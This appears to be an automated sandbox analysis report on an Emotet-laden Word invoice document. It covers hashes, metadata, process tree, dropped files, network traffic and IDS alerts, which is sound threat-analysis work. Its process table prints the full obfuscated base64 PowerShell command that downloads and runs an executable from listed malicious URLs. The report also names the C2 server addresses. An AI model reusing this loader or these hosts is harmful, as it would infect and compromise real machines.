File name: | Factura_B8151034.doc |
Full analysis: | https://app.any.run/tasks/bd27f557-310a-46c3-afd2-28473bdb9ac8 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 25, 2019, 18:49:22 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Apr 25 13:01:00 2019, Last Saved Time/Date: Thu Apr 25 13:01:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 5, Security: 0 |
MD5: | 6D9A875C59118BCA4576DBE81F347503 |
SHA1: | BFD2A5E5A4E79D3B3585847A326D53C65AA8E6D3 |
SHA256: | 225ED35D667AFBE8896F3E78476B8D80E569313E37F2F6E661B602A5399DEADE |
SSDEEP: | 6144:b77HUUUUUUUUUUUUUUUUUUUT52VjSy0h0ZB7dhxebp:b77HUUUUUUUUUUUUUUUUUUUTCeyKaB7+ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:04:25 12:01:00 |
ModifyDate: | 2019:04:25 12:01:00 |
Pages: | 1 |
Words: | - |
Characters: | 5 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 5 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1772 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Factura_B8151034.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
892 | powershell -e JABIAGsAQQBHAFEAYwBRAD0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAFEAJwAsACcAawBaAFgAJwApACwAJwBvAGsAJwAsACcAdwBVACcAKQA7ACQAWgBBAEEAawBBAEIAUQAgAD0AIAAnADMAOAAnADsAJABPAEQAawBrAEMAQQBEAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAEEAWABBACcALAAnAEIAJwApACwAJwBBACcAKQAsACcAcgAxACcAKQA7ACQAUgB3AFEAQwBrAEEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAQQBBAGsAQQBCAFEAKwAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7ACQAcAB3AHgAeABEAEQAawA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAE0AYwBBACcALAAnAGsAJwApACwAJwBVACcALAAnAEEAXwAnACkAOwAkAEUAbwBEAGsAQQAxAEQAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAG4AYABFAGAAVAAuAFcAZQBCAGMAbABpAGAAZQBOAFQAOwAkAEwAWABYAEMAWgBrAD0AKAAiAHsAMwAxAH0AewAxADgAfQB7ADMAMwB9AHsAMwA0AH0AewAxADMAfQB7ADIAOQB9AHsANAAwAH0AewAyADQAfQB7ADYAfQB7ADIAMwB9AHsAMgAwAH0AewAyADUAfQB7ADIAMQB9AHsAOQB9AHsANQB9AHsAMQA3AH0AewAzADcAfQB7ADMAMAB9AHsAMQA0AH0AewAxADAAfQB7ADEANQB9AHsAMQAxAH0AewAxADIAfQB7ADIAOAB9AHsAMwAyAH0AewA0AH0AewAxAH0AewAzADUAfQB7ADMAfQB7ADEAOQB9AHsAMgA2AH0AewAyADIAfQB7ADMAOQB9AHsAMwA2AH0AewAwAH0AewAyADcAfQB7ADMAOAB9AHsANwB9AHsAMgB9AHsAMQA2AH0AewA4AH0AIgAtAGYAIAAnAGMAJwAsACcALgBjACcALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcALwAnACwAJwB4AHIAOQAnACwAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAG4AJwAsACcAYwBnAGkAJwAsACcALQBiAGkAJwApACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHAAJwAsACcAbQAvAHcAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBuACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAaQBvACcALAAnAHAAbAAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHQAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcALwAnACwAJwBwAHMAOgAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAbQAnACwAJwAvADMAZwAnACkALAAnAHUAbQAnACkALAAnAC8AJwAsACcALwAnACwAJwB0ACcALAAnAGMAJwAsACcAegAnACwAJwBjAEQALwAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBwAC0AYQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcALwB3ACcALAAnAG8AbQAnACkAKQAsACcAaQByAC4AJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwBvAG0ALwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBwAC8AZwAnACwAJwBiAG4AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwA2ADAAJwAsACcANAB1ACcAKQApACwAJwBCAGMAJwAsACcALwBkAGEAJwAsACcAcAA6ACcALAAnAC0AcwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBtAC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcASgAnACwAJwBTAGMAcwAnACkAKQAsACcALwBAAGgAJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBNAFoAJwAsACcALwBAACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaAB0AHQAcAAnACwAJwA6AC8AJwApACwAJwAvADkAMQAnACkALAAnAHAAbAAnACwAKAAiAHsANAB9AHsAMQB9AHsAMgB9AHsAMAB9AHsAMwB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAJwB5AHQAJwAsACcALwBiAGEAJwAsACcAYQBzACcALAAnAGgALgBjACcAKQAsACcAaAA0AC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAaAB0AHQAcAA6AC8AJwAsACcAQAAnACkALAAnAG8AJwAsACcAbgAvAFUAJwApACwAJwBnACcALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAdABzAC8AJwAsACcARQAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAG4AJwAsACcAYQBwAHMAaABvACcAKQAsACcAaAAxAEcAJwApACwAJwBzAC4AYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBwADoALwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBAACcALAAnAGgAdAB0ACcAKQApACwAJwBkAG0AJwAsACcAYQAnACwAJwBoAHQAdAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBoAGkAJwAsACcALwBzACcAKQAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAC8AJwAsACcAZAB1AGsAawAnACkALAAnAGEAbgBrACcALAAnAC8AJwApACwAJwAuAGMAJwAsACcAbwAnACwAJwBwAGgAaQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBwACcALAAnAHAAcgBlACcAKQAsACcAbwBtACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBnAHIAYQAnACwAJwAyACcAKQAsACcAaQAnACkALgAiAHMAYABwAGwAaQB0ACIAKAAnAEAAJwApADsAJAB6AFgAVQBBAEEAWAA9ACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBBAEEAQQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBBACcALAAnAEEAQQBBACcAKQAsACcAagAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABZAEQAawBVADEAUQBCAEMAIABpAG4AIAAkAEwAWABYAEMAWgBrACkAewB0AHIAeQB7ACQARQBvAEQAawBBADEARAAuACIARABvAFcATgBgAGwAbwBgAEEARABmAGAAaQBMAGUAIgAoACQAWQBEAGsAVQAxAFEAQgBDACwAIAAkAFIAdwBRAEMAawBBACkAOwAkAFgAMQBVAEEAeAB3AD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBpAEQAVQAnACwAJwBaAF8AQQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUgB3AFEAQwBrAEEAKQAuACIAbABlAGAATgBnAFQASAAiACAALQBnAGUAIAAzADgANAA1ADAAKQAgAHsAJgAoACcASQBuAHYAbwAnACsAJwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAgACQAUgB3AFEAQwBrAEEAOwAkAE0AUQBvADQAQQBVAF8AVQA9ACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBBAEIAXwAnACwAJwBCAEQAJwApACwAJwBBACcALAAnAFkAJwApADsAYgByAGUAYQBrADsAJABRAEMAWABaAEEAWgA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAgACcAWgAnACwAJwBKACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAWABEADEAJwAsACcAYwBHACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAFoAQQBvAEEAQQBVAEEAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHoAdwAnACwAJwB3AEMARAAnACkALAAnAEEAQQAnACwAJwBEACcAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WmiPrvSE.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
644 | "C:\Users\admin\38.exe" | C:\Users\admin\38.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2520 | --f33b820f | C:\Users\admin\38.exe | 38.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
4020 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 38.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2528 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3552 | "C:\Users\admin\AppData\Local\soundser\wGFd2C.exe" | C:\Users\admin\AppData\Local\soundser\wGFd2C.exe | — | soundser.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3200 | --c021b4e6 | C:\Users\admin\AppData\Local\soundser\wGFd2C.exe | wGFd2C.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3572 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | wGFd2C.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1732 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
1772 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR219E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ICBZHBGDL0NJJHAH1W6V.temp | — | |
MD5:— | SHA256:— | |||
892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF112b43.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
2528 | soundser.exe | C:\Users\admin\AppData\Local\soundser\wGFd2C.exe | executable | |
MD5:C269F0952FD0EE6C8AAA2C895B51F1CE | SHA256:C5A51343901F1FA017AA35CA81D3D3894513377FE3FC3637EAEF90159BCAF384 | |||
3200 | wGFd2C.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:C269F0952FD0EE6C8AAA2C895B51F1CE | SHA256:C5A51343901F1FA017AA35CA81D3D3894513377FE3FC3637EAEF90159BCAF384 | |||
2520 | 38.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:3F5A7865E0EE668A2BFFCA64CBF127CD | SHA256:9C38B0B64EB091EB10521EE5A602940020AFA164615CC93898E771DFF24C97CE | |||
1772 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ctura_B8151034.doc | pgc | |
MD5:EAB6337AEBA8A5F1C555C5839EBD9D09 | SHA256:AAE8739DECA11BEAA796D109C0686B06E04EEC1002A6A818F42A85EDE5ACDC34 | |||
892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
1772 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:E0A6D871DF9AF8A843020CC2FC70CA4E | SHA256:33FAFDD37700ECE853AC83901FBEAB68A9A8E725B6B27DF6C65EDBF64767BE47 | |||
1772 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:59B956273838FEEC9491DD9A99EA2082 | SHA256:86C9EADC6D0BC7F4A81C585CE545BE107B541B3FF1CAABA05E42279205A68148 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1732 | soundser.exe | POST | — | 24.150.44.53:80 | http://24.150.44.53/nsip/between/ | CA | — | — | malicious |
892 | powershell.exe | GET | 200 | 165.227.97.68:80 | http://dukkank.com/wp-admin/Uh4/ | US | executable | 134 Kb | suspicious |
2528 | soundser.exe | POST | 200 | 24.150.44.53:80 | http://24.150.44.53/ringin/acquire/ringin/ | CA | binary | 67.6 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1732 | soundser.exe | 24.150.44.53:80 | — | Cogeco Cable | CA | malicious |
2528 | soundser.exe | 24.150.44.53:80 | — | Cogeco Cable | CA | malicious |
892 | powershell.exe | 165.227.97.68:80 | dukkank.com | Digital Ocean, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
dukkank.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
892 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
892 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
892 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2528 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 17 |
2528 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |